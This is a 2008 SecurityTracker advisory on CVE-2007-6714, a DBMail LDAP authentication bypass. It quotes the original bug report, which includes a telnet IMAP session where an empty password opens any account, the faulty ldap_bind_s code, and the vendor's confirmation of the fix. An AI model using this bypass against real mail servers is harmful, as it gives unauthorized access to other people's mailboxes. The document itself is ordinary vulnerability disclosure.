DBMail LDAP Authentication Bug Lets Remote Users Access Arbitrary Mail Accounts
|
|
SecurityTracker Alert ID: 1019914
|
|
SecurityTracker URL: http://securitytracker.com/id?1019914
|
|
CVE Reference: CVE-2007-6714
(Links to External Site)
|
Date: Apr 22 2008
|
Impact: User access via network
|
Fix Available: Yes
Exploit Included: Yes
Vendor Confirmed: Yes
|
Version(s): prior to 2.2.9
|
Description: A vulnerability was reported in DBMail. A remote user can bypass authentication and access arbitrary IMAP accounts on the target system.
A remote user can send an empty password string to login to arbitrary IMAP accounts without authenticating.
Systems using the
authldap module and an Active Directory LDAP server configured for anonymous logins are affected.
The vulnerability resides in
the ldap_bind_s() function in 'modules/authldap.c'.
vugluskr reported this vulnerability.
|
Impact: A remote user can access arbitrary IMAP accounts on the target system.
|
Solution: The vendor has issued a fix (2.2.9).
The vendor's advisory is available at:
http://www.dbmail.org/index.php?page=news&id=44
|
Vendor URL: www.dbmail.org/ (Links to External Site)
|
Cause: Authentication error
|
Underlying OS: Linux (Any), UNIX (Any)
|
Reported By: bugtrack <bugtrack@dbmail.org>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 16 Dec 2007 14:27:43 -0800
From: bugtrack <bugtrack@dbmail.org>
Subject: [Dbmail-dev] [DBMail 0000662]: Ability to bypass authentication.
|
The following issue has been RESOLVED.
======================================================================
http://dbmail.org/mantis/view.php?id=662
======================================================================
Reported By: vugluskr
Assigned To:
======================================================================
Project: DBMail
Issue ID: 662
Category: Authentication layer
Reproducibility: always
Severity: major
Priority: normal
Status: resolved
target:
Resolution: fixed
Fixed in Version: 2.2.9
======================================================================
Date Submitted: 16-Dec-07 18:10 CET
Last Modified: 16-Dec-07 23:14 CET
======================================================================
Summary: Ability to bypass authentication.
Description:
There is security hole in auth procedure. When used authldap module and on
LDAP server enabled anonymous login any user can login in any account
using as password empty string.
h000 ~ # telnet localhost 143
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
* OK dbmail imap (protocol version 4r1) server 2.2 ready to run
a login [EMAIL PROTECTED] ""
a OK LOGIN completed
a logout
* BYE dbmail imap server kisses you goodbye
a OK completed
Connection closed by foreign host.
On pop3 protocol I was not able to use this vulnerability. I don't know
how send empty password via pop3 protocol.
h000 ~ # telnet localhost 110
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
+OK DBMAIL pop3 server ready to rock
<[EMAIL PROTECTED]>
user [EMAIL PROTECTED]
+OK Password required for [EMAIL PROTECTED]
pass
-ERR your command does not compute
pass ""
-ERR username/password incorrect
quit
+OK see ya later
Connection closed by foreign host.
The root of the problem in use of function ldap_bind_s
int ldap_bind_s(LDAP *ld, const char *who, const char *cred,
int method);
If "cred" argument is "", ldap library try to authenticate as anonymous...
and bind return success. So dbmail let user to come in to mailbox.
modules/authldap.c:1263
if (ldap_err) {
TRACE(TRACE_ERROR, "ldap_bind_s failed: %s",
ldap_err2string(ldap_err));
*user_idnr = 0;
} else {
db_user_log_login(*user_idnr);
}
There is a path to fix this issue in attach.
PS: The LDAP is AD on win2k3 server.
======================================================================
----------------------------------------------------------------------
paul - 16-Dec-07 22:55
----------------------------------------------------------------------
Yes. This *only* affects AD, not openldap. I seem to remember fixing this
some time ago. Looks like a regression or I'm having serious deja-vu here
:-(
----------------------------------------------------------------------
paul - 16-Dec-07 23:14
----------------------------------------------------------------------
Patch accepted. Thanks.
Issue History
Date Modified Username Field Change
======================================================================
16-Dec-07 18:10 vugluskr New Issue
16-Dec-07 18:10 vugluskr File Added: dbmail-2.2.7-ldap_anonbind.patch
16-Dec-07 22:55 paul Note Added: 0002451
16-Dec-07 23:14 paul Note Added: 0002452
16-Dec-07 23:14 paul Status new => resolved
16-Dec-07 23:14 paul Resolution open => fixed
16-Dec-07 23:14 paul Fixed in Version => 2.2.9
======================================================================
_______________________________________________
Dbmail-dev mailing list
Dbmail-dev@dbmail.org
http://twister.fastxs.net/mailman/listinfo/dbmail-dev
|
|
